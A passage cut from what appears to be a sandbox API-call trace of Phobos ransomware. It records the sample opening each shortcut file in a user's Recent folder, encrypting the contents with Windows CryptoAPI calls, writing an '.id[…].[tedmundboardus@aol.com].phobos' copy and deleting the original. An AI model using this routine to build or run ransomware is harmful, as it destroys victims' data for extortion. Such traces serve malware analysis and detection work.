HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GB2mGEStAE9dp.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gb2mgestae9dp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.751] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32868) returned 1 [0200.751] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.751] ReadFile (in: hFile=0x160, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x401, lpOverlapped=0x0) returned 1 [0200.754] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410, dwBufLen=0x410 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410) returned 1 [0200.754] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x410, lpOverlapped=0x0) returned 1 [0200.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.755] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.755] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.755] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.755] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.755] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.755] CloseHandle (hObject=0x160) returned 1 [0200.755] CloseHandle (hObject=0xac) returned 1 [0200.755] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\GB2mGEStAE9dp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\gb2mgestae9dp.lnk")) returned 1 [0200.756] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.756] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HGjGuaMnCM8koFJ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hgjguamncm8kofj.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.759] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1035) returned 1 [0200.759] CloseHandle (hObject=0xac) returned 1 [0200.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HGjGuaMnCM8koFJ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hgjguamncm8kofj.lnk")) returned 0x20 [0200.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HGjGuaMnCM8koFJ.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hgjguamncm8kofj.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HGjGuaMnCM8koFJ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hgjguamncm8kofj.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.759] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.759] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.759] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HGjGuaMnCM8koFJ.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hgjguamncm8kofj.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.760] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32868) returned 1 [0200.760] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.760] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x40b, lpOverlapped=0x0) returned 1 [0200.761] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410, dwBufLen=0x410 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x410) returned 1 [0200.761] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x410, lpOverlapped=0x0) returned 1 [0200.762] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.762] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.762] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.762] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.762] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.762] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.762] CloseHandle (hObject=0xac) returned 1 [0200.762] CloseHandle (hObject=0x160) returned 1 [0200.762] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HGjGuaMnCM8koFJ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hgjguamncm8kofj.lnk")) returned 1 [0200.763] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HKLcdpGkbvv2YoBm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hklcdpgkbvv2yobm.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.764] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2469) returned 1 [0200.764] CloseHandle (hObject=0x160) returned 1 [0200.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HKLcdpGkbvv2YoBm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hklcdpgkbvv2yobm.lnk")) returned 0x20 [0200.765] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HKLcdpGkbvv2YoBm.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hklcdpgkbvv2yobm.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HKLcdpGkbvv2YoBm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hklcdpgkbvv2yobm.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.765] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.765] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HKLcdpGkbvv2YoBm.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hklcdpgkbvv2yobm.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.766] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32868) returned 1 [0200.766] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.766] ReadFile (in: hFile=0x160, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9a5, lpOverlapped=0x0) returned 1 [0200.767] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9b0, dwBufLen=0x9b0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9b0) returned 1 [0200.767] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x9b0, lpOverlapped=0x0) returned 1 [0200.768] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.768] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.768] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.768] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.768] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.768] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.768] CloseHandle (hObject=0x160) returned 1 [0200.769] CloseHandle (hObject=0xac) returned 1 [0200.769] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HKLcdpGkbvv2YoBm.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hklcdpgkbvv2yobm.lnk")) returned 1 [0200.770] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.770] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HkmuqdG7gP.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hkmuqdg7gp.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.771] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2520) returned 1 [0200.771] CloseHandle (hObject=0xac) returned 1 [0200.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HkmuqdG7gP.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hkmuqdg7gp.flv.lnk")) returned 0x20 [0200.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HkmuqdG7gP.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hkmuqdg7gp.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.771] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HkmuqdG7gP.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hkmuqdg7gp.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.772] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.772] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HkmuqdG7gP.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hkmuqdg7gp.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.773] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32868) returned 1 [0200.773] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.773] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9d8, lpOverlapped=0x0) returned 1 [0200.774] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9e0, dwBufLen=0x9e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9e0) returned 1 [0200.774] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x9e0, lpOverlapped=0x0) returned 1 [0200.775] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.775] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.775] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.775] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.775] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.775] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.775] CloseHandle (hObject=0xac) returned 1 [0200.775] CloseHandle (hObject=0x160) returned 1 [0200.776] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HkmuqdG7gP.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\hkmuqdg7gp.flv.lnk")) returned 1 [0200.776] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i0q0D553GbO.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i0q0d553gbo.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.778] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3657) returned 1 [0200.778] CloseHandle (hObject=0x160) returned 1 [0200.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i0q0D553GbO.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i0q0d553gbo.mkv.lnk")) returned 0x20 [0200.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i0q0D553GbO.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i0q0d553gbo.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i0q0D553GbO.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i0q0d553gbo.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.778] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.778] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i0q0D553GbO.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i0q0d553gbo.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.779] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32868) returned 1 [0200.779] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.779] ReadFile (in: hFile=0x160, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe49, lpOverlapped=0x0) returned 1 [0200.781] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe50, dwBufLen=0xe50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe50) returned 1 [0200.781] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe50, lpOverlapped=0x0) returned 1 [0200.782] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328e8) returned 1 [0200.782] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.782] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.782] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.782] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.782] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.782] CloseHandle (hObject=0x160) returned 1 [0200.782] CloseHandle (hObject=0xac) returned 1 [0200.782] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\i0q0D553GbO.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\i0q0d553gbo.mkv.lnk")) returned 1 [0200.783] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ioAZiZSgJKDJy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ioazizsgjkdjy.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.784] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=6839) returned 1 [0200.784] CloseHandle (hObject=0xac) returned 1 [0200.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ioAZiZSgJKDJy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ioazizsgjkdjy.lnk")) returned 0x20 [0200.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ioAZiZSgJKDJy.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ioazizsgjkdjy.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ioAZiZSgJKDJy.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ioazizsgjkdjy.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.785] 